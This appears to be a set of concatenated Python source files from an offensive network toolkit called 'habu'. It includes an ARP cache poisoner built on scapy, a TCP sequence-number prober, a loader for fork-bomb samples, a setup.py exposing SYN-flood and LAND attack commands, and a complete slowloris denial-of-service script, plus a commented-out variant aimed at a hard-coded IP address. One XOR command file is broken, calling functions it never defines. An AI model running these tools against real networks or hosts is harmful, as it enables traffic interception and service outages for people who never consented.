import click
from scapy.all import ICMP, IP, conf, sr1, UDP, TCP, Ether, BOOTP, DHCP, get_if_raw_hwaddr, srp


@click.command()
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-t', 'timeout', default=5, help='Time (seconds) to wait for responses')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_dhcp_discover(iface, timeout, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    conf.checkIPaddr = False

    hw = get_if_raw_hwaddr(conf.iface)

    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    ip = IP(src="0.0.0.0",dst="255.255.255.255")
    udp = UDP(sport=68,dport=67)
    bootp = BOOTP(chaddr=hw)
    dhcp = DHCP(options=[("message-type","discover"),"end"])

    dhcp_discover = ether / ip / udp / bootp / dhcp

    ans, unans = srp(dhcp_discover, multi=True, timeout=5)      # Press CTRL-C after several seconds

    for _, pkt in ans:
        if verbose:
            print(pkt.show())
        else:
            print(pkt.summary())


if __name__ == '__main__':
    cmd_dhcp_discover()




from itertools import cycle


def xor(a, b='0'.encode()):

    return bytes([a ^ b for a, b in zip(a, cycle(b))])


if __name__ == '__main__':
    text = b'text to encrypt'
    encrypted = xor(text)
    plain = xor(encrypted)
    print(text == plain)



import requests
import os
import csv
import operator
from pprint import pprint

url_nmap_services = 'https://svn.nmap.org/nmap/nmap-services'

FILEDIR = os.path.dirname(os.path.abspath(__file__))
DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
SERVICES_FILE = os.path.abspath(os.path.join(DATADIR, 'services'))

def update_nmap_services():

    services = []

    r = requests.get(url_nmap_services)

    if r.status_code != 200:
        return None

    for line in r.text.split('\n'):

        if line.startswith('#'):
            continue

        l = line.split('\t', maxsplit=3)

        if len(l) > 2:
            services.append(l)

    for protocol in ['tcp', 'udp']:
        with open(SERVICES_FILE + '-' + protocol, 'w') as output:
            for row in sorted(services, reverse=True, key=operator.itemgetter(2)):
                if protocol in row[1]:
                    output.write("%s\n" %(row[1].split('/')[0]))

if __name__ == '__main__':
    update_nmap_services()




import os
from glob import glob

FILEDIR = os.path.dirname(os.path.abspath(__file__))
DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
BOMBDIR = os.path.join(DATADIR, 'forkbomb')

bombs = [
    'bash',
    'batch',
    'c',
    'haskell',
    'perl',
    'php',
    'python',
    'ruby',
]

def get_bomb(bomb):

    if bomb not in bombs:
        return ''

    with open(BOMBDIR + '/' + bomb + '.txt') as b:
        return b.read()


if __name__ == '__main__':
    print(get_bomb('c'))




from scapy.all import arpcachepoison, conf
import ipaddress

conf.verb = 0

def arpoison(target1, target2, interval=5):

    try:
        ipaddress.ip_address(target1)
        ipaddress.ip_address(target2)
    except ValueError:
        print("Bad IP address")
        return 1

    arpcachepoison(target1, target2, interval)


if __name__ == '__main__':
    pass



import click

help_text = [
    ('habu.arpoison', 'ARP cache poisoner *'),
    ('habu.arpsniff', 'ARP sniffer *'),
    ('habu.contest', 'Check internet connection capabilities'),
    ('habu.eicar', 'Print EICAR antimalware test data'),
    ('habu.forkbomb', 'Show various forkbomb examples'),
    ('habu.hasher', 'Calculate hashes using various algorithms'),
    ('habu.help', 'Print this help message'),
    ('habu.ip', 'Show your public IP'),
    ('habu.update', 'Update data files'),
    ('habu.xor', 'XOR cipher'),

]

@click.command()
def cmd_help():
    """Habu help"""

    print('* = Need root privileges')

    for c, h in help_text:
        print('%-20s%-12s' % (c, h))

if __name__ == '__main__':
    cmd_help()




import click
from habu.lib import extract


@click.command()
@click.option('-k', default='0', help='Encryption key')
@click.option('-i', type=click.File('rb'), required=True, help='Input file')
@click.option('-o', type=click.File('wb'), required=True, help='Output file')
def cmd_extract(k, i, o):
    """XOR cipher"""
    o.write(xor(i.read(), k.encode()))


if __name__ == '__main__':
    cmd_xor()



import click

from scapy.all import ICMP, IP, conf, sr1, UDP, TCP, srloop, send, RandShort
from time import sleep

@click.command()
@click.argument('ip')
@click.option('-p', 'port', default=80, help='Port to use (default: 80)')
@click.option('-c', 'count', default=5, help='How many packets to send/receive (default: 5)')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-g', 'graph', is_flag=True, default=False, help='Graph (requires matplotlib)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_isn(ip, port, count, iface, graph, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    isn_values = []

    for _ in range(count):
        pkt = IP(dst=ip)/TCP(sport=RandShort(), dport=port, flags="S")
        ans = sr1(pkt, timeout=0.5)
        if ans:
            send(IP(dst=ip)/TCP(sport=pkt[TCP].sport, dport=port, ack=ans[TCP].seq + 1, flags='A'))
            isn_values.append(ans[TCP].seq)
            if verbose:
                ans.show2()

    if graph:

        try:
            import matplotlib.pyplot as plt
        except ImportError:
            print("To graph support, install matplotlib")
            return 1

        plt.plot(range(len(isn_values)), isn_values, 'ro')
        plt.show()

    else:

        for v in isn_values:
            print(v)

    return True


if __name__ == '__main__':
    cmd_isn()




from setuptools import setup

with open('README.rst') as f:
    readme = f.read()

setup(
    name='habu',
    version='0.0.26',
    description='Network Hacking Toolkit',
    long_description=readme,
    author='Fabian Martinez Portantier',
    author_email='fabian@portantier.com',
    url='https://github.com/portantier/habu',
    license='Copyright Fabian Martinez Portantier',
    install_requires=[
        'click',
        'requests',
        'scapy-python3',
    ],
    tests_require=[
        'pytest',
        'pytest-runner',
    ],
    entry_points='''
        [console_scripts]
        habu.arpoison=habu.cli.cmd_arpoison:cmd_arpoison
        habu.arpsniff=habu.cli.cmd_arpsniff:cmd_arpsniff
        habu.contest=habu.cli.cmd_contest:cmd_contest
        habu.dhcp_discover=habu.cli.cmd_dhcp_discover:cmd_dhcp_discover
        habu.eicar=habu.cli.cmd_eicar:cmd_eicar
        habu.firewall=habu.cli.cmd_firewall:cmd_firewall
        habu.forkbomb=habu.cli.cmd_forkbomb:cmd_forkbomb
        habu.hasher=habu.cli.cmd_hasher:cmd_hasher
        habu.help=habu.cli.cmd_help:cmd_help
        habu.ip=habu.cli.cmd_ip:cmd_ip
        habu.isn=habu.cli.cmd_isn:cmd_isn
        habu.land=habu.cli.cmd_land:cmd_land
        habu.ping=habu.cli.cmd_ping:cmd_ping
        habu.snmp_crack=habu.cli.cmd_snmp_crack:cmd_snmp_crack
        habu.tcpflags=habu.cli.cmd_tcpflags:cmd_tcpflags
        habu.traceroute=habu.cli.cmd_traceroute:cmd_traceroute
        habu.synflood=habu.cli.cmd_synflood:cmd_synflood
        habu.xor=habu.cli.cmd_xor:cmd_xor
    ''',
    classifiers=[
        "Environment :: Console",
        "Intended Audience :: Developers",
        "Intended Audience :: Information Technology",
        "Intended Audience :: System Administrators",
        "Topic :: Security",
        "Topic :: System :: Networking",
        "Programming Language :: Python :: 3.0",
        "Programming Language :: Python :: 3.6",
    ],
    packages=['habu', 'habu.lib', 'habu.cli'],
    include_package_data=True,
    keywords=['security'],
    zip_safe=False,
    test_suite='py.test',
)



import click
from scapy.all import TCP, IP, conf, send
from time import sleep
import argparse
import logging
import random
import socket
import ssl
import sys
import time

def init_socket(host, port, https=False):

    ua = "Mozilla/5.0"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #s.settimeout(4)

    #if ssl:
    #    s = ssl.wrap_socket(s)

    s.connect((host, port))

    #s.send("GET / HTTP/1.1\r\n".encode("utf-8"))
    #s.send("User-Agent: {}\r\n".format(ua).encode())
    #s.send("Accept-language: en-US,en,q=0.5\r\n".encode())
    time.sleep(1)

    return s


@click.command()
@click.argument('host')
@click.option('-c', 'count', default=100, help='How many sockets (default: 100)')
@click.option('-p', 'port', default=80, help='Port to use (default: 80)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
@click.option('--https', is_flag=True, default=False, help='Use SSL/TLS (default: No)')
def cmd_slowloris(host, count, port, https, verbose):

    list_of_sockets = []

    socket_count = count
    print("Attacking %s with %s sockets." %(host, socket_count))
    print("Creating sockets...")

    for num in range(count):
        try:
            print("Creating socket %s" % num)
            s = init_socket(host, port, https)
            list_of_sockets.append(s)
        except socket.error:
            print("SOCKET ERROROOOROROR")
            break

    while True:
        print("Sending keep-alive headers... Socket count: %s" %(len(list_of_sockets)))
        for s in list_of_sockets:
            try:
                s.send("X-SLOW: 5\r\n".encode("utf-8"))
            except socket.error:
                list_of_sockets.remove(s)

        for _ in range(socket_count - len(list_of_sockets)):
            print("Recreating socket...")
            try:
                s = init_socket(host, port, https)
                if s:
                    list_of_sockets.append(s)
            except socket.error:
                print("SOCKET ERROROOOROROR")
                break

        time.sleep(1)


if __name__ == '__main__':
    cmd_slowloris()

'''
import socket
from time import sleep

count = 50

socks = {}

for n in range(count):
    socks[n] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    socks[n].connect(("45.77.113.133", 80)) # www.portantier.com
    socks[n].send("GET / HTTP/1.0\r\n".encode())
    socks[n].setblocking(False)


while True:
    for n in socks.keys():
        socks[n].send("X-SLOW: {}\n\n".format(n, n).encode())
        if socks[n].recv(1024):
            del socks[n]
        sleep(2)

#for num in range(count):
#    socklist[num].send("X-LAST: 1\r\n\r\n".encode())
'''

